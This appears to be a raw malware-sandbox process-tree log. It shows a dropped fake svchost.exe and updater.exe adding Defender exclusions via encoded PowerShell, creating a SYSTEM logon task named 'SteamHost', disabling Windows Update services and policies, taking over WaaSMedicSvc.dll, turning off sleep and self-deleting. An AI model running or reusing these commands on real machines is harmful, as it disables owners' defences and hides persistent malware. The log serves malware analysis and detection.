C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe5⤵
- Drops file in Windows directory
PID:2504
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "SteamHost" /tr "C:\Users\Admin\Chrome\updater.exe"5⤵PID:2688
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /ru "System" /tn "SteamHost" /tr "C:\Users\Admin\Chrome\updater.exe"6⤵
- Scheduled Task/Job: Scheduled Task
PID:348
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c "C:\Users\Admin\Chrome\updater.exe"5⤵
- Loads dropped DLL
PID:1812 -
C:\Users\Admin\Chrome\updater.exeC:\Users\Admin\Chrome\updater.exe6⤵
- Executes dropped EXE
PID:2928 -
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\Chrome\updater.exe"7⤵
- Drops file in Drivers directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2620 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAGUAcwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAcAB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAbwB1AHEAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAbABxACMAPgA="8⤵PID:2388
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -EncodedCommand "PAAjAGUAcwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAcAB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAbwB1AHEAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAbABxACMAPgA="9⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1464
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c sc stop wuauserv & sc stop bits & sc stop dosvc & sc stop UsoSvc & sc stop WaaSMedicSvc & sc config wuauserv start= disabled & sc failure wuauserv reset= 0 actions= "" & sc config bits start= disabled & sc failure bits reset= 0 actions= "" & sc config dosvc start= disabled & sc failure dosvc reset= 0 actions= "" & sc config UsoSvc start= disabled & sc failure UsoSvc reset= 0 actions= "" & sc config wuauserv start= disabled & sc failure wuauserv reset= 0 actions= "" & takeown /f C:\\Windows\\System32\\WaaSMedicSvc.dll & icacls C:\\Windows\\System32\\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename C:\\Windows\\System32\\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f & reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sih" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sihboot" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantWakeupRun" /DISABLE8⤵PID:2952
-
C:\Windows\system32\sc.exesc stop wuauserv9⤵
- Launches sc.exe
PID:1084
-
-
C:\Windows\system32\sc.exesc stop bits9⤵
- Launches sc.exe
PID:2060
-
-
C:\Windows\system32\sc.exesc stop dosvc9⤵
- Launches sc.exe
PID:2600
-
-
C:\Windows\system32\sc.exesc stop UsoSvc9⤵
- Launches sc.exe
PID:600
-
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc9⤵
- Launches sc.exe
PID:2320
-
-
C:\Windows\system32\sc.exesc config wuauserv start= disabled9⤵
- Launches sc.exe
PID:1936
-
-
C:\Windows\system32\sc.exesc failure wuauserv reset= 0 actions= ""9⤵
- Launches sc.exe
PID:2440
-
-
C:\Windows\system32\sc.exesc config bits start= disabled9⤵
- Launches sc.exe
PID:684
-
-
C:\Windows\system32\sc.exesc failure bits reset= 0 actions= ""9⤵
- Launches sc.exe
PID:1744
-
-
C:\Windows\system32\sc.exesc config dosvc start= disabled9⤵
- Launches sc.exe
PID:2456
-
-
C:\Windows\system32\sc.exesc failure dosvc reset= 0 actions= ""9⤵
- Launches sc.exe
PID:2580
-
-
C:\Windows\system32\sc.exesc config UsoSvc start= disabled9⤵
- Launches sc.exe
PID:2348
-
-
C:\Windows\system32\sc.exesc failure UsoSvc reset= 0 actions= ""9⤵
- Launches sc.exe
PID:2684
-
-
C:\Windows\system32\sc.exesc config wuauserv start= disabled9⤵
- Launches sc.exe
PID:2936
-
-
C:\Windows\system32\sc.exesc failure wuauserv reset= 0 actions= ""9⤵
- Launches sc.exe
PID:2984
-
-
C:\Windows\system32\takeown.exetakeown /f C:\\Windows\\System32\\WaaSMedicSvc.dll9⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:264
-
-
C:\Windows\system32\icacls.exeicacls C:\\Windows\\System32\\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q9⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2892
-
-
C:\Windows\system32\reg.exereg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f9⤵PID:908
-
-
C:\Windows\system32\reg.exereg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f9⤵PID:1556
-
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AUOptions /d 2 /t REG_DWORD /f9⤵PID:2824
-
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f9⤵PID:2788
-
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f9⤵PID:2904
-
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f9⤵PID:1880
-
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Automatic App Update" /DISABLE9⤵PID:712
-
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Scheduled Start" /DISABLE9⤵PID:2928
-
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sih" /DISABLE9⤵PID:2964
-
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sihboot" /DISABLE9⤵PID:1660
-
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistant" /DISABLE9⤵PID:2592
-
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantCalendarRun" /DISABLE9⤵PID:2748
-
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantWakeupRun" /DISABLE9⤵PID:2012
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 08⤵
- Power Settings
PID:2524 -
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-ac 09⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:296
-
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-dc 09⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:1568
-
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-ac 09⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:2500
-
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-dc 09⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:1988
-
-
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe8⤵PID:1808
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "sjrcqeodaodte"9⤵PID:316
-
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\svchost.exe"5⤵PID:2756
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 36⤵PID:2516
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c start C:\Users\Admin\AppData\Local\Temp\svchost.exe2⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2932 -
C:\Users\Admin\AppData\Local\Temp\svchost.exeC:\Users\Admin\AppData\Local\Temp\svchost.exe3⤵
- Executes dropped EXE
PID:2652 -
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\svchost.exe"4⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2268 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAGUAcwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAcAB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAbwB1AHEAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAbABxACMAPgA="5⤵PID:2416
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -EncodedCommand "PAAjAGUAcwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAcAB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAbwB1AHEAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAbABxACMAPgA="6⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2188
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c sc stop wuauserv & sc stop bits & sc stop dosvc & sc stop UsoSvc & sc stop WaaSMedicSvc & sc config wuauserv start= disabled & sc failure wuauserv reset= 0 actions= "" & sc config bits start= disabled & sc failure bits reset= 0 actions= "" & sc config dosvc start= disabled & sc failure dosvc reset= 0 actions= "" & sc config UsoSvc start= disabled & sc failure UsoSvc reset= 0 actions= "" & sc config wuauserv start= disabled & sc failure wuauserv reset= 0 actions= "" & takeown /f C:\\Windows\\System32\\WaaSMedicSvc.dll & icacls C:\\Windows\\System32\\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename C:\\Windows\\System32\\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f & reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sih" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sihboot" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantWakeupRun" /DISABLE5⤵PID:2084
-
C:\Windows\system32\sc.exesc stop wuauserv6⤵
- Launches sc.exe
PID:1964
-
-
C:\Windows\system32\sc.exesc stop bits6⤵
- Launches sc.exe
PID:2496
-
-
C:\Windows\system32\sc.exesc stop dosvc6⤵
- Launches sc.exe
PID:1944
-
-
C:\Windows\system32\sc.exesc stop UsoSvc6⤵
- Launches sc.exe
PID:3028
-
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc6⤵
- Launches sc.exe
PID:1224
-
-
C:\Windows\system32\sc.exesc config wuauserv start= disabled6⤵
- Launches sc.exe
PID:2800
-
-
C:\Windows\system32\sc.exesc failure wuauserv reset= 0 actions= ""6⤵
- Launches sc.exe
PID:2932
-
-
C:\Windows\system32\sc.exesc config bits start= disabled6⤵
- Launches sc.exe
PID:1908
-
-
C:\Windows\system32\sc.exesc failure bits reset= 0 actions= ""6⤵
- Launches sc.exe
PID:592
-
-
C:\Windows\system32\sc.exesc config dosvc start= disabled6⤵
- Launches sc.exe
PID:2676
-
-
C:\Windows\system32\sc.exesc failure dosvc reset= 0 actions= ""6⤵
- Launches sc.exe
PID:1456
-
-
C:\Windows\system32\sc.exesc config UsoSvc start= disabled6⤵
- Launches sc.exe
PID:2700
-
-
C:\Windows\system32\sc.exesc failure UsoSvc reset= 0 actions= ""6⤵
- Launches sc.exe
PID:2548
-
-
C:\Windows\system32\sc.exesc config wuauserv start= disabled6⤵
- Launches sc.exe
PID:1892
-
-
C:\Windows\system32\sc.exesc failure wuauserv reset= 0 actions= ""6⤵
- Launches sc.exe
PID:1856
-
-
C:\Windows\system32\takeown.exetakeown /f C:\\Windows\\System32\\WaaSMedicSvc.dll6⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1876
-
-
C:\Windows\system32\icacls.exeicacls C:\\Windows\\System32\\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q6⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2332
-
-
C:\Windows\system32\reg.exereg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f6⤵PID:1304
-
-
C:\Windows\system32\reg.exereg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f6⤵PID:980
-
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AUOptions /d 2 /t REG_DWORD /f6⤵PID:2088
-
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f6⤵PID:1576
-
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f6⤵PID:1568
-
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f6⤵PID:1936
-
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Automatic App Update" /DISABLE6⤵PID:2228
-
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Scheduled Start" /DISABLE6⤵PID:1704
-
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sih" /DISABLE6⤵PID:304
-
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sihboot" /DISABLE6⤵PID:2416
-
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistant" /DISABLE6⤵PID:2448
-
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantCalendarRun" /DISABLE6⤵PID:684
-
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantWakeupRun" /DISABLE6⤵PID:2076
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 05⤵
- Power Settings
PID:316 -
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-ac 06⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:2104
-
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-dc 06⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:2752
-
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-ac 06⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:2840
-
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-dc 06⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:2648
-
-
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe5⤵
- Drops file in Windows directory
PID:1016
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "SteamHost" /tr "C:\Users\Admin\Chrome\updater.exe"5⤵PID:1580
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /ru "System" /tn "SteamHost" /tr "C:\Users\Admin\Chrome\updater.exe"6⤵
- Scheduled Task/Job: Scheduled Task
PID:2272
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c "C:\Users\Admin\Chrome\updater.exe"5⤵
- Loads dropped DLL
PID:708 -
C:\Users\Admin\Chrome\updater.exeC:\Users\Admin\Chrome\updater.exe6⤵
- Executes dropped EXE
PID:1880 -
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\Chrome\updater.exe"7⤵
- Drops file in Drivers directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1492 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAGUAcwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAcAB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAbwB1AHEAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAbABxACMAPgA="8⤵PID:2752
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -EncodedCommand "PAAjAGUAcwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAcAB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAbwB1AHEAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAbABxACMAPgA="9⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2020
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c sc stop wuauserv & sc stop bits & sc stop dosvc & sc stop UsoSvc & sc stop WaaSMedicSvc & sc config wuauserv start= disabled & sc failure wuauserv reset= 0 actions= "" & sc config bits start= disabled & sc failure bits reset= 0 actions= "" & sc config dosvc start= disabled & sc failure dosvc reset= 0 actions= "" & sc config UsoSvc start= disabled & sc failure UsoSvc reset= 0 actions= "" & sc config wuauserv start= disabled & sc failure wuauserv reset= 0 actions= "" & takeown /f C:\\Windows\\System32\\WaaSMedicSvc.dll & icacls C:\\Windows\\System32\\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename C:\\Windows\\System32\\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f & reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sih" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sihboot" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantWakeupRun" /DISABLE8⤵PID:1456
-
C:\Windows\system32\sc.exesc stop wuauserv9⤵
- Launches sc.exe
PID:2200
-
-
C:\Windows\system32\sc.exesc stop bits9⤵
- Launches sc.exe
PID:2272
-
-
C:\Windows\system32\sc.exesc stop dosvc9⤵
- Launches sc.exe
PID:2460
-
-
C:\Windows\system32\sc.exesc stop UsoSvc9⤵
- Launches sc.exe
PID:1884
-
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc9⤵
- Launches sc.exe
PID:408
-
-
C:\Windows\system32\sc.exesc config wuauserv start= disabled9⤵
- Launches sc.exe
PID:2332
-
-
C:\Windows\system32\sc.exesc failure wuauserv reset= 0 actions= ""9⤵
- Launches sc.exe
PID:1928
-
-
C:\Windows\system32\sc.exesc config bits start= disabled9⤵
- Launches sc.exe
PID:324
-
-
C:\Windows\system32\sc.exesc failure bits reset= 0 actions= ""9⤵
- Launches sc.exe
PID:1684
-
-
C:\Windows\system32\sc.exesc config dosvc start= disabled9⤵
- Launches sc.exe
PID:2448
-
-
C:\Windows\system32\sc.exesc failure dosvc reset= 0 actions= ""9⤵
- Launches sc.exe
PID:1672
-
-
C:\Windows\system32\sc.exesc config UsoSvc start= disabled9⤵
- Launches sc.exe
PID:868
-
-
C:\Windows\system32\sc.exesc failure UsoSvc reset= 0 actions= ""9⤵
- Launches sc.exe
PID:2084
-
-
C:\Windows\system32\sc.exesc config wuauserv start= disabled9⤵
- Launches sc.exe
PID:2472
-
-
C:\Windows\system32\sc.exesc failure wuauserv reset= 0 actions= ""9⤵
- Launches sc.exe
PID:2476
-
-
C:\Windows\system32\takeown.exetakeown /f C:\\Windows\\System32\\WaaSMedicSvc.dll9⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1380
-
-
C:\Windows\system32\icacls.exeicacls C:\\Windows\\System32\\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q9⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1580
-
-
C:\Windows\system32\reg.exereg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f9⤵PID:2268
-
-
C:\Windows\system32\reg.exereg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f9⤵PID:2808
-
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AUOptions /d 2 /t REG_DWORD /f9⤵PID:2236
-
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f9⤵PID:2520
-
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f9⤵PID:3008
-
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f9⤵PID:2220
-
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Automatic App Update" /DISABLE9⤵PID:2800
-
-
